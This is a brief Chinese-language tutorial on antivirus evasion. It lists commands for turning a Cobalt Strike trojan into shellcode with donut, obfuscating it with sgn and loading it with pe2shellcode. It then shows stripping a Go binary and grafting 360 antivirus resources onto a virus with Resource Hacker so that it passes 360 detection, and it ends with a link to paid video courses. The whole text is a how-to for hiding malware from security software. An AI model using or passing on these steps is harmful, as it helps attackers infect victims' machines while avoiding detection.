cs生成的木马混淆后上线
第一步,使用donut.exe生成.bin文件
donut.exe -i calc.exe -a 2(x64是2,x86是1) 把exe转换成.bin(测试时将calc.exe替换成木马)

第二步,使用工具sgn对bin文件进行混淆
sgn.exe -a 64(64位系统) -c 5(等待时间为5) shellcode.bin

第三步,使用pe2she_1.2将混淆后的.bin文件上线shellcode
免杀练习:给一个病毒加上可信资源过360
使用到的工具:
go-strip -f binary.exe -a -output new.exe
new.exe即是混淆后的二进制文件
开始之前先用360扫一下该病毒,报毒:

使用Resource Hacker将任意一个360的资源保存下来
项目下载地址:

将保存下来的资源导入到病毒中


成功过杀软

更多【免杀基础之给病毒加上可信资源过360杀软】相关视频教程:www.yxfzedu.com